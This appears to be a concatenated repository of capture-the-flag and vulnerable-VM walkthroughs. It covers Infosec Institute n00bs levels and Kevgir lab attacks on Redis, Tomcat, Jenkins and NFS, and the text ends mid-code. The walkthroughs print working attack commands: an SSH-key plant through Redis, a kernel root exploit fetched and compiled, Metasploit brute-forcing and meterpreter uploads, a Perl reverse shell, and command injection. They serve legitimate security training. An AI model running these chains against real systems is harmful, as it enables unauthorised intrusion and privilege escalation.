Name	Age	Nationality
Mary Jane	18	American

Name

Age

Nationality

Mary Jane

American

Not Found

The requested URL /levelthirteen.php.backup was not found on this server.

Apache/2.4.7 (Ubuntu) Server at ctf.infosecinstitute.com Port 80

Infosec Institute n00bs CTF Labs

49 |

50 | ... 51 | 52 | BINGO! 53 | 54 | 2. This is interesting... 55 | 56 |

Do you want to download this mysterious file?

57 | 58 | 59 | 60 | 61 | Download it 62 | 63 | $ wget http://ctf.infosecinstitute.com/misc/imadecoy 64 | $ file imadecoy 65 | imadecoy: tcpdump capture file (little-endian) - version 2.4 (Linux "cooked", capture length 65535) 66 | 67 | Yep! Another capture. Let's open it with Wireshark... 68 | 69 | 3. Let's try to filter only `HTTP` packets with filter `http`. Mmmm... there are some image files (GIF, PNG)... 70 | 71 | 4. Please Whireshark, help me!!! 72 | 73 | File -> Export Objects -> HTTP 74 | 75 | 5. `HoneyPY.PNG`... May be a honeypot? Let's try to ppen it... 76 | 77 | infosec_flagis_morepackets 78 | 79 | -------------------------------------------------------------------------------- /infosec/n00bs/l14.md: -------------------------------------------------------------------------------- 1 | # Flag 2 | 3 | Flag: infosec_flagis_whatsorceryisthis 4 | 5 | # Procedure 6 | 7 | 1. Download the database dump 8 | 9 | $ wget http://ctf.infosecinstitute.com/misc/level14 10 | 11 | 2. Take a look to `flags` and `friends` tables. They seem to be intresting. 12 | 13 | 2.1 In table `friends` there is a suspect string 14 | 15 | \\u0069\\u006e\\u0066\\u006f\\u0073\\u0065\\u0063\\u005f\\u0066\\u006c\\u0061\\u0067\\u0069\\u0073\\u005f\\u0077\\u0068\\u0061\\u0074\\u0073\\u006f\\u0072\\u0063\\u0065\\u0072\\u0079\\u0069\\u0073\\u0074\\u0068\\u0069\\u0073 16 | 17 | Let's try to decode it on `http://rishida.net/tools/conversion/` 18 | 19 | infosec_flagis_whatsorceryisthis 20 | 21 | 2.2 In table `flags` there is another suspect string 22 | 23 | $P$B8p.TUJAbjULMWrNXm8GsH4fb2PWfF. 24 | 25 | I'll try to decode/crack it with John the Ripper... (update: nothing to do! I'm pretty sure that `$P$B8p...` is a decoy) 26 | 27 | -------------------------------------------------------------------------------- /infosec/n00bs/l15.md: -------------------------------------------------------------------------------- 1 | # Flag 2 | 3 | * flag: infosec_flagis_rceatomized 4 | * bonus flag: INFOSECFLAGISMORSECODETONES 5 | 6 | # Procedure 7 | 8 | 1. By inserting `google.com` the result seems to be a standard Dig output. 9 | 10 | 2. Let's try to insert `-h` option... It works! (the man page is shown) 11 | 12 | 3. Let's try to insert `; ls -al`. If correct, at server side it should be 13 | equivalent to 14 | 15 | $ dig; ls -al 16 | 17 | 4. Yep! Directory listing works! Moreover, a suspect file named `.hey` is 18 | present. 19 | 20 | 5. Download it 21 | 22 | $ wget http://ctf.infosecinstitute.com/levelfifteen/.hey 23 | $ cat .hey 24 | Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC 25 | 26 | 6. Should `ZLibC` be a hint? I'm still working on it... Grrr... 27 | 28 | 7. Meanwhile (I'm curious), let's try take a look in the file system... 29 | 30 | 8. Wow! In `/misc` there is the `readme.wav` file (never used in past levels). 31 | By hearing it, seems to be newly a Morse code 32 | 33 | .. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... . -.-. --- -.. . - --- -. . ... 34 | 35 | 9. Decode it 36 | 37 | .. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... . -.-. --- -.. . - --- -. . ... 38 | I N F O S E C F L A G I S M O R S E C O D E T O N E S 39 | 40 | 10. After spending many time by trying several combinations of ZLib and GZip 41 | headers, I realised that ZLibC is a decoy!!! Let's try to decrypt it by 42 | trying several methods... 43 | 44 | 11. Googling on the web, I found this interesting web site 45 | 46 | http://crypo.in.ua/tools/ 47 | 48 | that offers several encryption/decryption for many algorithms 49 | 50 | 12. After trying (without success) popular encryptors, I started with fastest 51 | encryptors and with `ATOM 128`... BINGO!!! 52 | 53 | http://crypo.in.ua/tools/eng_atom128c.php 54 | -------------------------------------------------------------------------------- /kevgir/000-redis.md: -------------------------------------------------------------------------------- 1 | # Redis 2 | 3 | By exploiting the Redis' vulnerability presented by antirez in 4 | [his blog post](http://antirez.com/news/96), we'll try to get access to the 5 | target machine. 6 | 7 | ## Port scanning to identify Redis 8 | 9 | Let's try to scan the target machine (`canyoupwnme`) with `nmap` 10 | 11 | $ nmap -A -T4 -sT -p1-65535 canyoupwnme 12 | ... 13 | 1322/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 14 | ... 15 | 6379/tcp open redis Redis key-value store 16 | ... 17 | 18 | Seems that Redis is binded on the default port and SSH on custom port 1322. 19 | 20 | ## Check for Redis AUTH 21 | 22 | By using `telnet`, verify if Redis requires authentication 23 | 24 | $ telnet canyoupwnme 6379 25 | Trying 10.0.100.195... 26 | Connected to canyoupwnme.pentest. 27 | Escape character is '^]'. 28 | echo "You can pwn me!!!" 29 | $15 30 | You can pwn me!!! 31 | quit 32 | +OK 33 | Connection closed by foreign host. 34 | 35 | Yep! Redis does not require AUTH. Before going ahead, let's get some system 36 | information via Redis `INFO` command 37 | 38 | $ redis-cli -h canyoupwnme 39 | canyoupwnme:6379> INFO 40 | # Server 41 | redis_version:3.0.7 42 | ... 43 | os:Linux 3.19.0-25-generic i686 44 | arch_bits:32 45 | ... 46 | gcc_version:4.8.4 47 | ... 48 | config_file:/etc/redis/6379.conf 49 | ... 50 | 51 | ## Preparing the SSH key 52 | 53 | The antirez's attack exploits Redis to upload the SSH pubkey on the target 54 | machine. Let's start by creating a new set of keys that we use to access the 55 | machine. 56 | 57 | $ mkdir ssh-redis 58 | $ ssh-keygen -f ./ssh-redis/attacker 59 | 60 | ## Identify the right path on the target machine 61 | 62 | By using `redis-cli` tool as oracle, we identify user's home path(s). The idea 63 | is to exploit the `redis-cli` return messages. 64 | 65 | $ redis-cli -h canyoupwnme CONFIG SET dir "/root" 66 | OK 67 | 68 | $ redis-cli -h canyoupwnme CONFIG SET dir "/xxx/yyy" 69 | (error) ERR Changing directory: No such file or directory 70 | 71 | By using a [usernames wordlist](https://raw.githubusercontent.com/jeanphorn/wordlist/master/usernames.txt) 72 | and a simple [Python script](./scripts/redis-oracle.py) we iterate over all 73 | the usernames in order to check all the paths formed as follows 74 | 75 | /home//.ssh 76 | 77 | After a while, we get the following path 78 | 79 | /home/user/.ssh 80 | 81 | ## Do the attack 82 | 83 | As indicated by antirez, the idea at the base of the attack is to use the 84 | `SAVE` command to overwrite the `authorized_keys` file of the victim. All the 85 | attack's steps are well explained in the antirez's blog. 86 | 87 | * Generating the blob to be injected 88 | 89 | $ echo -e '\n\n' >> blob.txt 90 | $ cat ssh-redis/attacker.pub >> blob.txt 91 | $ echo -e '\n\n' >> blob.txt 92 | 93 | * Getting the current Redis' configuration (`dir` is already set due to the 94 | previous path's identification phase) 95 | 96 | $ redis-cli -h canyoupwnme 97 | canyoupwnme:6379> CONFIG GET dir 98 | 1) "dir" 99 | 2) "/home/user/.ssh" 100 | canyoupwnme:6379> CONFIG GET dbfilename 101 | 1) "dbfilename" 102 | 2) "dump.rdb" 103 | 104 | * Update the Redis' configuration 105 | 106 | $ redis-cli -h canyoupwnme 107 | canyoupwnme:6379> CONFIG SET dbfilename "authorized_keys" 108 | canyoupwnme:6379> CONFIG GET dir 109 | 1) "dir" 110 | 2) "/home/user/.ssh" 111 | canyoupwnme:6379> CONFIG GET dbfilename 112 | 1) "dbfilename" 113 | 2) "authorized_keys" 114 | 115 | * Do the attack 116 | 117 | $ # flushing the current Reids' db 118 | $ redis-cli -h canyoupwnme flushall 119 | OK 120 | $ # set the `sshblob` key with the SSH pubkey value 121 | $ cat blob.txt | redis-cli -h canyoupwnme -x set sshblob 122 | OK 123 | $ # save the current db in /home/user/.ssh/authorized_keys file 124 | $ redis-cli -h canyoupwnme save 125 | OK 126 | 127 | * Try the SSH login 128 | 129 | $ ssh -l user -i ssh-redis/attacker canyoupwnme -p1322 130 | 131 | G: ,; 132 | E#, : f#i .Gt t j. 133 | E#t .GE .E#t j#W: Ej EW, 134 | E#t j#K; i#W, t .DD. ;K#f E#, E##j 135 | E#GK#f L#D. EK: ,WK. .G#D. E#t E###D. 136 | E##D. :K#Wfff; E#t i#D j#K; E#t E#jG#W; 137 | E##Wi i##WLLLLt E#t j#f ,K#f ,GD; E#t E#t t##f 138 | E#jL#D: .E#L E#tL#i j#Wi E#t E#t E#t :K#E: 139 | E#t ,K#j f#E: E#WW, .G#D: E#t E#t E#KDDDD###i 140 | E#t jD ,WW; E#K: ,K#fK#t E#t E#f,t#Wi,,, 141 | j#t .D#; ED. j###t E#t E#t ;#W: 142 | ,; tt t .G#t E#t DWi ,KK: 143 | ;; ,;. 144 | 145 | by canyoupwn.me 146 | 147 | Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686) 148 | 149 | * Documentation: https://help.ubuntu.com/ 150 | 151 | System information as of Fri Apr 15 10:50:08 EEST 2016 152 | 153 | System load: 0.0 Memory usage: 3% Processes: 79 154 | Usage of /: 32.5% of 6.50GB Swap usage: 0% Users logged in: 0 155 | 156 | Graph this data and manage this system at: 157 | https://landscape.canonical.com/ 158 | 159 | 151 packages can be updated. 160 | 79 updates are security updates. 161 | 162 | Last login: Thu Apr 14 20:02:53 2016 from kali.pentest 163 | user@canyoupwnme:~$ whoami 164 | user 165 | user@canyoupwnme:~$ pwd 166 | /home/user 167 | 168 | ## Getting `root` privileges 169 | 170 | We got access in the target machine. Now let's try to get a `root` access. We 171 | already obtained the kernel version with Redis `INFO` command. 172 | Just to be sure... 173 | 174 | $ uname -a 175 | Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux 176 | 177 | The kernel version is `3.19.0-25-generic` that was built on 178 | `Fri Jul 24 21:18:00 UTC 2015`. After a while, the following exploit seems to 179 | be ok 180 | 181 | https://www.exploit-db.com/exploits/39166 182 | 183 | Let's try it... 184 | 185 | $ pwd 186 | /home/user 187 | $ id 188 | uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),115(lpadmin) 189 | $ mkdir tmp 190 | $ cd tmp 191 | $ wget https://www.exploit-db.com/download/39166 -O poc.c 192 | $ gcc poc.c -o poc.bin 193 | $ ./poc.bin 194 | # id 195 | # uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),115(lpadmin),1000(user) 196 | 197 | Got it! 198 | -------------------------------------------------------------------------------- /kevgir/001-tomcat.md: -------------------------------------------------------------------------------- 1 | # Tomcat 2 | 3 | Goal of this attack is to deploy a reverse shell on the target machine. 4 | 5 | ## Port scanning to identify Tomcat 6 | 7 | Let's scan the target machine (`canyoupwnme`) with `nmap` 8 | 9 | $ nmap -A -T4 -sT -p1-65535 canyoupwnme 10 | ... 11 | 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 12 | | http-methods: 13 | | Supported Methods: GET HEAD POST PUT DELETE OPTIONS 14 | |_ Potentially risky methods: PUT DELETE 15 | |_http-open-proxy: Proxy might be redirecting requests 16 | |_http-server-header: Apache-Coyote/1.1 17 | |_http-title: Apache Tomcat 18 | ... 19 | 20 | ## Check what is available 21 | 22 | With your browser, open the URL 23 | 24 | http://canyoupwnme:8080/manager 25 | 26 | Seems that the Tomcat's management console is available, but authentication is 27 | needed. Metsasploit can help us... 28 | 29 | ## Brute forcing the Tomcat's management console 30 | 31 | msf > use auxiliary/scanner/http/tomcat_mgr_login 32 | msf auxiliary(tomcat_mgr_login) > set rhosts canyoupwnme 33 | msf auxiliary(tomcat_mgr_login) > set rport 8080 34 | msf auxiliary(tomcat_mgr_login) > exploit 35 | 36 | [!] No active DB -- Credential data will not be saved! 37 | [-] 10.0.100.195:8080 TOMCAT_MGR - LOGIN FAILED: admin:admin (Incorrect: ) 38 | [-] 10.0.100.195:8080 TOMCAT_MGR - LOGIN FAILED: admin:manager (Incorrect: ) 39 | ...) 40 | [+] 10.0.100.195:8080 - LOGIN SUCCESSFUL: tomcat:tomcat 41 | ... 42 | [*] Scanned 1 of 1 hosts (100% complete) 43 | [*] Auxiliary module execution completed 44 | msf auxiliary(tomcat_mgr_login) > quit 45 | 46 | Yep! Credentials `tomcat:tomcat` were found. Still using Metasploit, we can 47 | upload a crafted `.WAR` in order to have a meterpreter session. 48 | 49 | ## Startin a meterpreter session 50 | 51 | msf > use exploit/multi/http/tomcat_mgr_upload 52 | msf exploit(tomcat_mgr_upload) > set username tomcat 53 | msf exploit(tomcat_mgr_upload) > set password tomcat 54 | msf exploit(tomcat_mgr_upload) > set rhost canyoupwnme 55 | msf exploit(tomcat_mgr_upload) > set rport 8080 56 | msf exploit(tomcat_mgr_upload) > exploit 57 | 58 | [*] Started reverse TCP handler on 10.0.100.245:4444 59 | [*] canyoupwnme:8080 - Retrieving session ID and CSRF token... 60 | [*] canyoupwnme:8080 - Uploading and deploying Hv5hJD7sAuzbRX3UGWiOctD6yz3j... 61 | [*] canyoupwnme:8080 - Executing Hv5hJD7sAuzbRX3UGWiOctD6yz3j... 62 | [*] canyoupwnme:8080 - Undeploying Hv5hJD7sAuzbRX3UGWiOctD6yz3j ... 63 | [*] Sending stage (45741 bytes) to 10.0.100.195 64 | [*] Meterpreter session 1 opened (10.0.100.245:4444 -> 10.0.100.195:52043) at 2016-04-18 13:33:40 +0200 65 | 66 | meterpreter > shell 67 | Process 1 created. 68 | Channel 1 created. 69 | id 70 | uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7) 71 | 72 | ## Becoming `root` 73 | 74 | On the attacker machine, download and configure a Perl reverse shell 75 | 76 | $ wget http://pentestmonkey.net/tools/perl-reverse-shell/perl-reverse-shell-1.0.tar.gz 77 | $ tar zxvf perl-reverse-shell-1.0.tar.gz 78 | $ cd perl-reverse-shell-1.0 79 | $ vim perl-reverse-shell.pl # set IP and PORT at lines 45 and 46 80 | 81 | Once prepared, upload the reverse shell on the target machine using the 82 | meterpreter 83 | 84 | meterpreter > upload perl-reverse-shell.pl /tmp/perl-reverse-shell.pl 85 | [*] uploading : perl-reverse-shell.pl -> /tmp/perl-reverse-shell.pl 86 | [*] uploaded : perl-reverse-shell.pl -> /tmp/perl-reverse-shell.pl 87 | 88 | On the attacker machine, start listening 89 | 90 | $ nc -nvp 9876 91 | listening on [any] 9876 ... 92 | 93 | while on the victim machine, execute the Perl script 94 | 95 | meterpreter > shell 96 | Process 2 created. 97 | Channel 3 created. 98 | perl /tmp/perl-reverse-shell.pl 99 | Content-Length: 0 100 | Connection: close 101 | Content-Type: text/html 102 | 103 | Content-Length: 43 104 | Connection: close 105 | Content-Type: text/html 106 | 107 | Sent reverse shell to 10.0.100.245:9876

108 | 109 | On the attacker machine you should see something like that 110 | 111 | connect to [10.0.100.245] from canyoupwnme.pentest [10.0.100.195] 53929 112 | 12:24:48 up 55 min, 0 users, load average: 0.00, 0.01, 0.04 113 | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 114 | Linux canyoupwnme 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux 115 | uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7) 116 | / 117 | /usr/sbin/apache: 0: can't access tty; job control turned off 118 | $ 119 | 120 | Spawn a `tty` shell 121 | 122 | $ python -c "import pty; pty.spawn('/bin/bash');" 123 | tomcat7@canyoupwnme:/$ whoami 124 | whoami 125 | tomcat7 126 | tomcat7@canyoupwnme:/$ id 127 | id 128 | uid=106(tomcat7) gid=114(tomcat7) groups=114(tomcat7) 129 | 130 | and try with the `overlayfs` local root exploit used with 131 | [Redis](000-redis.md) 132 | 133 | $ mkdir tmp 134 | $ cd tmp 135 | $ wget https://www.exploit-db.com/download/39166 -O ofs.c 136 | $ gcc ofs.c -o ofs.bin 137 | $ ./ofs.bin 138 | # id 139 | # uid=0(root) gid=1000(user) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(sambashare),115(lpadmin),1000(user) 140 | 141 | Got it! 142 | -------------------------------------------------------------------------------- /kevgir/002-jenkins.md: -------------------------------------------------------------------------------- 1 | # Jenkins 2 | 3 | ## Port scanning to identify Jenkins 4 | 5 | Let's scan the target machine (`canyoupwnme`) with `nmap` 6 | 7 | $ nmap -A -T4 -sT -p1-65535 canyoupwnme 8 | ... 9 | 9000/tcp open http Jetty winstone-2.9 10 | |_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1 11 | | http-methods: 12 | |_ Supported Methods: GET HEAD POST OPTIONS 13 | | http-robots.txt: 1 disallowed entry 14 | |_/ 15 | |_http-server-header: Jetty(winstone-2.9) 16 | |_http-title: Dashboard [Jenkins] 17 | ... 18 | 19 | Jenkins is reachable on port `9000`! 20 | 21 | ## Information gathering 22 | 23 | Typically, Jenkins exposes an endpoint (`/people` or `/asynchPeople`) that 24 | does not require authentication and where all the defined users are listed. 25 | Just to be sure, we can use `jenkins_enum` auxiliary 26 | 27 | msf > use auxiliary/scanner/http/jenkins_enum 28 | msf auxiliary(jenkins_enum) > set rhosts canyoupwnme 29 | msf auxiliary(jenkins_enum) > set rport 9000 30 | msf auxiliary(jenkins_enum) > set targeturi / 31 | msf auxiliary(jenkins_enum) > exploit 32 | 33 | [*] 10.0.100.195:9000 - Jenkins Version - 1.647 34 | [*] 10.0.100.195:9000 - /script restricted (403) 35 | [*] 10.0.100.195:9000 - /view/All/newJob restricted (403) 36 | [+] 10.0.100.195:9000 - /asynchPeople/ does not require authentication (200) 37 | [*] 10.0.100.195:9000 - /systemInfo restricted (403) 38 | [*] Scanned 1 of 1 hosts (100% complete) 39 | [*] Auxiliary module execution completed 40 | 41 | According to `/asynchPeople`, users defined in the target machine are 42 | 43 | * admin (Jarvis) 44 | * anonymous (anonymous) 45 | 46 | After trying the login with few terrible combinations (e.g. `admin/admin`), 47 | let's see if Metasploit can help us 48 | 49 | msf > search jenkins 50 | 51 | Matching Modules 52 | ================ 53 | 54 | Name Disclosure Date Rank Description 55 | ---- --------------- ---- ----------- 56 | auxiliary/gather/jenkins_cred_recovery normal Jenkins Domain Credential Recovery 57 | auxiliary/scanner/http/jenkins_enum normal Jenkins Enumeration 58 | auxiliary/scanner/http/jenkins_login normal Jenkins-CI Login Utility 59 | exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Jenkins CLI RMI Java Deserialization Vulnerability 60 | exploit/multi/http/jenkins_script_console 2013-01-18 good Jenkins Script-Console Java Execution 61 | 62 | Let's try with `auxiliary/scanner/http/jenkins_login` and Rockyou wordlist 63 | 64 | msf > use auxiliary/scanner/http/jenkins_login 65 | msf auxiliary(jenkins_login) > set username admin 66 | msf auxiliary(jenkins_login) > set pass_file rockyou.txt 67 | msf auxiliary(jenkins_login) > set rhosts canyoupwnme 68 | msf auxiliary(jenkins_login) > set rport 9000 69 | msf auxiliary(jenkins_login) > set stop_on_success true 70 | msf auxiliary(jenkins_login) > exploit 71 | 72 | [-] 10.0.100.195:9000 JENKINS - LOGIN FAILED: admin:123456 (Incorrect) 73 | [-] 10.0.100.195:9000 JENKINS - LOGIN FAILED: admin:12345 (Incorrect) 74 | [-] 10.0.100.195:9000 JENKINS - LOGIN FAILED: admin:123456789 (Incorrect) 75 | ... 76 | [-] 10.0.100.195:9000 JENKINS - LOGIN FAILED: admin:flower (Incorrect) 77 | [-] 10.0.100.195:9000 JENKINS - LOGIN FAILED: admin:playboy (Incorrect) 78 | [+] 10.0.100.195:9000 - LOGIN SUCCESSFUL: admin:hello 79 | [*] Scanned 1 of 1 hosts (100% complete) 80 | [*] Auxiliary module execution completed 81 | 82 | Yep! Credentials are `admin/hello`... 83 | 84 | ## The Groovy scripts 85 | 86 | Two years ago, I read an interesting post entitled 87 | [How I hacked Facebook](http://blog.dewhurstsecurity.com/2014/12/09/how-i-hacked-facebook.html). 88 | It refers to an unprotected Jenkins instance where the author used a Groovy 89 | script to execute some commands on the server. Why not trying the same? In the 90 | previous Metasploit search, there is something interesting 91 | 92 | exploit/multi/http/jenkins_script_console 93 | 94 | Let's try with it... 95 | 96 | msf > use exploit/multi/http/jenkins_script_console 97 | msf exploit(jenkins_script_console) > set username admin 98 | msf exploit(jenkins_script_console) > set password hello 99 | msf exploit(jenkins_script_console) > set rhost canyoupwnme 100 | msf exploit(jenkins_script_console) > set rport 9000 101 | msf exploit(jenkins_script_console) > set targeturi / 102 | msf exploit(jenkins_script_console) > set target 1 103 | msf exploit(jenkins_script_console) > exploit 104 | 105 | [*] Started reverse TCP handler on 10.0.100.245:4444 106 | [*] Checking access to the script console 107 | [*] Logging in... 108 | [*] canyoupwnme:9000 - Sending Linux stager... 109 | [*] Transmitting intermediate stager for over-sized stage...(105 bytes) 110 | [*] Sending stage (1495599 bytes) to 10.0.100.195 111 | [*] Meterpreter session 2 opened (10.0.100.245:4444 -> 10.0.100.195:44531) at 2016-04-18 18:13:30 +0200 112 | [!] Deleting /tmp/AaqyV payload file 113 | 114 | meterpreter > shell 115 | Process 1840 created. 116 | Channel 1 created. 117 | /bin/sh: 0: can't access tty; job control turned off 118 | $ whoami 119 | jenkins 120 | $ id 121 | uid=109(jenkins) gid=117(jenkins) groups=117(jenkins) 122 | $ 123 | 124 | ## Becoming `root` 125 | 126 | See "Becoming `root`" section in [Tomcat](./001-tomcat.md). 127 | -------------------------------------------------------------------------------- /kevgir/003-nfs.md: -------------------------------------------------------------------------------- 1 | # Exploiting NFS 2 | 3 | ## Port scanning 4 | 5 | According to `nmap` result, a NFS export should be available 6 | 7 | $ nmap -A -T4 -sT -p1-65535 canyoupwnme 8 | ... 9 | 2049/tcp open nfs 2-4 (RPC #100003) 10 | ... 11 | 12 | ## Mount the NFS export 13 | 14 | Let's scan the available exports 15 | 16 | $ showmount -e canyoupwnme 17 | Export list for canyoupwnme: 18 | /backup * 19 | 20 | Now, let's try to mount `/backup` and to get the content 21 | 22 | $ mkdir backup 23 | $ mount -o ro,noexec canyoupwnme:/backup backup 24 | $ ls backup 25 | backup.tar.bz2.zip 26 | 27 | Get a local copy of the archive 28 | 29 | $ cp backup/backup.tar.bz2.zip . 30 | $ umount ./backup 31 | $ unzip backup.tar.bz2.zip 32 | Archive: backup.tar.bz2.zip 33 | [backup.tar.bz2.zip] backup.tar.bz2 password: 34 | 35 | Mmmm... a password protected ZIP! Let's try with `fcrackzip`... 36 | 37 | $ fcrackzip -u backup.tar.bz2.zip 38 | PASSWORD FOUND!!!!: pw == aaaaaa 39 | 40 | ## Get the ZIP content 41 | 42 | Let's see inside the ZIP archive 43 | 44 | $ unzip -P aaaaaa backup.tar.bz2.zip 45 | Archive: backup.tar.bz2.zip 46 | inflating: backup.tar.bz2 47 | $ tar jxf backup.tar.bz2 48 | $ ls 49 | backup.tar.bz2 backup.tar.bz2.zip html 50 | $ ls html 51 | dvwa gentleman index.html web-standards zenphoto 52 | 53 | It includes a directory `html` that could be a backup of `/var/www/html` in 54 | production. Let's try if the following URLs work 55 | 56 | * http://canyoupwnme/dvwa (it works!!!) 57 | * http://canyoupwnme/gentleman 58 | * http://canyoupwnme/web-standards 59 | * http://canyoupwnme/zenphoto (it works!!!) 60 | 61 | ## DVWA 62 | 63 | Work in progress... 64 | 65 | ## ZenPhoto 66 | 67 | Let's try if something interesting is available in `zenphoto` dir 68 | 69 | $ cd html/zenphoto 70 | $ find . -iname "*config*" 71 | ./zp-data/zp-config.php 72 | ./zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/config.base.php 73 | ./zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/config.php 74 | ./zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/config.tinymce.php 75 | ./zp-core/zp-extensions/tiny_mce/config 76 | 77 | The file `zp-config.php` could be useful... 78 | 79 | $ cat zp-data/zp-config.php 80 | ... 81 | $conf['mysql_user'] = 'root'; // Supply your MySQL user id. 82 | $conf['mysql_pass'] = 'toor'; // Supply your MySQL password. 83 | $conf['mysql_host'] = 'localhost'; // Supply the name of your MySQL server. 84 | $conf['mysql_database'] = 'zenphoto'; // Supply the name of Zenphoto's database 85 | ... 86 | $conf['mysql_prefix'] = "zp_"; 87 | 88 | Interesting information! According to `dirsearch` output... 89 | 90 | $ python3 dirsearch.py --url http://canyoupwnme -e htm,html,php,js,css,asp 91 | ... 92 | [17:11:38] 301 - 314B - /phpmyadmin -> http://canyoupwnme/phpmyadmin/ 93 | [17:11:38] 200 - 8KB - /phpmyadmin/ 94 | ... 95 | 96 | ... an instance of phpMyAdmin is available! Let's try the login with 97 | `root:toor`. It works! 98 | 99 | ### Obtaining ZenPhoto `admin` access 100 | 101 | By looking into phpMyAdmin, we can see two sets of tables in `zenphoto` 102 | database. The two sets use `zp_` and `zenphoto_` prefixes. Which is the one 103 | in production? 104 | 105 | In the saved `zp-config.php`, we can see that the table prefix is `zp_` but 106 | we have not idea about how old the backup is. It could refer to an old 107 | installation. 108 | 109 | By listing the content of `/html/zenphoto/zp-data` we can see some 110 | interesting files 111 | 112 | $ ls -l html/zenphoto/zp-data 113 | total 16 114 | -rw------- 1 www-data www-data 364 Feb 12 22:22 security_log.txt 115 | -rw-r--r-- 1 www-data www-data 1022 Feb 12 22:21 setup_log.txt 116 | -rw-r--r-- 1 www-data www-data 4250 Feb 12 22:19 zp-config.php 117 | $ cat html/zenphoto/zp-data/security_log.txt 118 | date requestor's IP type user ID user name outcome authority additional information 119 | 2016-02-12 23:22:39 192.168.1.33 Request add user Success zp_admin admin 120 | 2016-02-12 23:22:39 192.168.1.33 Blocked access Failed /zp-core/admin-users.php%3Fsaved%3D%26page%3Dusers%26show-admin%3D 121 | 2016-02-12 23:22:51 192.168.1.33 Back-end admin Admin Istrator Success zp_admin 122 | 123 | Seems that user `admin` was defined. We use this information to identify the 124 | right tables set. By going back in phpMyAdmin we can see that in table 125 | `zenphoto_administrators` the only interesting user is `travis` while in 126 | `zp_administrators` we have the `admin` user with MD5 hased password 127 | `6b310943e286bfd054ef45b9a2f66561`. Information about the used hash can be 128 | found in `html/zenphoto/zp-core/lib-auth.php`. 129 | 130 | $ head -74 html/zenphoto/zp-core/lib-auth.php | tail -15 131 | /** 132 | * Returns the hash of the zenphoto password 133 | * 134 | * @param string $user 135 | * @param string $pass 136 | * @return string 137 | */ 138 | function passwordHash($user, $pass) { 139 | $hash = getOption('extra_auth_hash_text'); 140 | $md5 = md5($user . $pass . $hash); 141 | if (DEBUG_LOGIN) { debugLog("passwordHash($user, $pass)[$hash]:$md5"); } 142 | return $md5; 143 | } 144 | 145 | We could try to brute force the hash but we've the `root` power. Why not 146 | editing the DB entry? The new password is generated with a simple PHP script 147 | 148 | $ php new-pass.php 149 | New password is: f6fdffe48c908deb0f4c3bd36c032e72 150 | $ cat new-pass.php 151 | 158 | 159 | By modifying the `admin` row with the obtained MD5 value we can access 160 | ZenPhoto with `admin:admin`. 161 | 162 | ### Being victim of a decoy 163 | 164 | > This part is what I thinking was the right way before realising that 165 | > `zenphoto_*` tables were a decoy (or another challenge...) 166 | 167 | In the `zenphoto` database, we can see two sets of tables with prefixes `zp_` 168 | and `zenphoto_`. Even if `zp-config.php` suggests us to use `zp_` tables, 169 | `zenphoto_` tables seem to be those in production. Nince information from 170 | `zenphoto_administrators` tabe are 171 | 172 | * username: travis 173 | * password: nT/y9QPmdknO/pu7QI4kNZK3yVk3h/Lan5M6mWLTE4I= 174 | 175 | while nince information from `zenphoto_options` table are 176 | 177 | * zenphoto_install: a:12:{ ... s:8:"ZENPHOTO";s:18:"1.4.11[26c78176cf]" ...} 178 | * extra_auth_hash_text: 0@n6AraXM~L8pQ/&eOY=cHGw52l(q! 179 | * strong_hash: 3 180 | * min_password_lenght: 6 181 | 182 | In the ZenPhoto repo on GitHub 183 | (tag [zenphoto-1.4.11](https://github.com/zenphoto/zenphoto/tree/zenphoto-1.4.11)), 184 | I found something interesting in `zp-core/lib-auth.php:167-197` 185 | 186 | /** 187 | * Returns the hash of the zenphoto password 188 | * 189 | * @param string $user 190 | * @param string $pass 191 | * @return string 192 | */ 193 | static function passwordHash($user, $pass, $hash_type = NULL) { 194 | if (is_null($hash_type)) { 195 | $hash_type = getOption('strong_hash'); 196 | } 197 | switch ($hash_type) { 198 | case 1: 199 | $hash = sha1($user . $pass . HASH_SEED); 200 | break; 201 | case 2: 202 | // deprecated beause of possible "+" in the text 203 | $hash = base64_encode(self::pbkdf2($pass, $user . HASH_SEED)); 204 | break; 205 | case 3: 206 | $hash = str_replace('+', '-', base64_encode(self::pbkdf2($pass, $user . HASH_SEED))); 207 | break; 208 | default: 209 | $hash = md5($user . $pass . HASH_SEED); 210 | break; 211 | } 212 | if (DEBUG_LOGIN) { 213 | debugLog("passwordHash($user, $pass, $hash_type)[ " . HASH_SEED . " ]:$hash"); 214 | } 215 | return $hash; 216 | } 217 | 218 | and `zp-core/lib-auth.php:1239-1265` 219 | 220 | /** PBKDF2 Implementation (described in RFC 2898) 221 | * 222 | * @param string p password 223 | * @param string s salt 224 | * @param int c iteration count (use 1000 or higher) 225 | * @param int kl derived key length 226 | * @param string a hash algorithm 227 | * 228 | * @return string derived key 229 | */ 230 | static function pbkdf2($p, $s, $c = 1000, $kl = 32, $a = 'sha256') { 231 | $hl = strlen(hash($a, null, true)); # Hash length 232 | $kb = ceil($kl / $hl); # Key blocks to compute 233 | $dk = ''; # Derived key 234 | # Create key 235 | for ($block = 1; $block <= $kb; $block++) { 236 | # 